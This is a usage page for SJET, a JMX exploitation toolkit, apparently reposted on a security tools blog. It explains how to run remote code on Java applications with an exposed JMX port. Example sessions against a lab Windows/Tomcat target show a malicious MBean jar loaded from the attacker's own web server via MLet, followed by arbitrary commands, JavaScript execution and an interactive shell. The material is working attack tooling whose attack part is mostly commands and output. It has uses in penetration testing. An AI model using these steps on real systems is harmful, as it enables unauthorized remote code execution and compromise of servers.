SJET - JMX Exploitation Toolkit
Java Management Extensions (JMX) is a Java technology that supplies tools for managing and monitoring applications, system objects, devices (such as printers) and service-oriented networks. Those resources are represented by objects called MBeans (for Managed Bean). In the API, classes can be dynamically loaded and instantiated. Managing and monitoring applications can be designed and developed using the Java Dynamic Management Kit.
SJET is a JMX exploitation toolkit.
Prerequisites
Usage
SJET implements a CLI interface (using argparse):
jython sjet.py targetHost targetPort MODE (modeOptions)
Where- targetHost - the target IP address
- targerPort - the target port where JMX is running
- MODE - the script mode
- modeOptions - the options for the mode selected
Modes and modeOptions
- install - installs the payload in the current target.
- payload_url - full URL to load the payload
- payload_port - port to load the payload
- command - runs the command CMD in the targetHost
- CMD - the command to run
- javascript - runs a javascript file FILENAME in the targetHost
- FILENAME - the javascript to be run
- shell - starts a simple shell in targetHost (with the limitations of java's Runtime.exec())
Example
Installing the payload in a Windows target:
Patricios-MacBook-Pro:sjet preller$ Jython sjet.py 192.168.56.101 8008 install http://192.168.56.1 8888
[+] sjet was brought to you by siberas :)
[+] Starting webserver at port 8888
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.56.101:8008/jmxrmi
[+] Connected: rmi://192.168.56.1 1
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://192.168.56.1:8888
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
192.168.56.101 - - [11/Aug/2017 11:16:10] "GET / HTTP/1.1" 200 -
192.168.56.101 - - [11/Aug/2017 11:16:10] "GET /siberas_mlet.jar HTTP/1.1" 200 -
[+] Successfully loaded Siberas:name=payload,id=1
Patricios-MacBook-Pro:sjet preller$
Running the command 'dir' in a Windows target:
Patricios-MacBook-Pro:sjet preller$ Jython sjet.py 192.168.56.101 8008 command "dir"
[+] sjet was brought to you by siberas :)
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.56.101:8008/jmxrmi
[+] Connected: rmi://192.168.56.1 2
[+] Loaded de.siberas.lab.SiberasPayload
[+] Executing command: dir
Volume in drive C has no label.
Volume Serial Number is E0CE-337D
Directory of C:\Program Files\Apache Software Foundation\Tomcat 9.0
08/11/2017 01:34 AM <DIR> .
08/11/2017 01:34 AM <DIR> ..
08/11/2017 01:34 AM 3 ASDASD.txt
08/10/2017 07:08 AM <DIR> bin
08/10/2017 07:08 AM <DIR> conf
08/10/2017 07:08 AM <DIR> lib
08/02/2017 01:29 PM 58,153 LICENSE
08/11/2017 01:24 AM <DIR> logs
08/02/2017 01:29 PM 1,859 NOTICE
08/02/2017 01:29 PM 6,881 RELEASE-NOTES
08/11/2017 02:16 AM <DIR> temp
08/02/2017 01:29 PM 21,630 tomcat.ico
08/02/2017 01:29 PM 73,690 Uninstall.exe
08/10/2017 07:08 AM <DIR> webapps
08/10/2017 07:08 AM <DIR> work
08/11/2017 02:30 AM 17 _____SURELY_A_SAFE_FILE_____.exe
08/11/2017 02:29 AM 17 _____AND_DONT_CALL_ME_SHIRLEY_____.exe
8 File(s) 162,253 bytes
9 Dir(s) 124,198,735,872 bytes free
[+] Done
Patricios-MacBook-Pro:sjet preller$
Running the file poc.js in a Windows target:
Patricios-MacBook-Pro:sjet preller$ Jython sjet.py 192.168.56.101 8008 javascript "poc.js"
[+] sjet was brought to you by siberas :)
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.56.101:8008/jmxrmi
[+] Connected: rmi://192.168.56.1 4
[+] Loaded de.siberas.lab.SiberasPayload
[+] Executing script
None
Patricios-MacBook-Pro:sjet preller$
Running ping in shell mode in a Windows target:
Patricios-MacBook-Pro:sjet preller$ Jython sjet.py 192.168.56.101 8008 shell
[+] sjet was brought to you by siberas :)
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.56.101:8008/jmxrmi
[+] Connected: rmi://192.168.56.1 9
[+] Use command 'exit_shell' to exit the shell
>>> ping 127.0.0.1
[+] Loaded de.siberas.lab.SiberasPayload
[+] Executing command: ping 127.0.0.1
Pinging 127.0.0.1 with 32 bytes of data:
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Ping statistics for 127.0.0.1:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
>>>
>>>
[4]+ Stopped Jython sjet.py 192.168.56.101 8008 shell
Patricios-MacBook-Pro:sjet preller$
Authors
- Hans-Martin Münch - Initial idea and work - h0ng10
- Patricio Reller - CLI and extra options - preller
SJET - JMX Exploitation Toolkit
Reviewed by Zion3R
on
6:13 PM
Rating: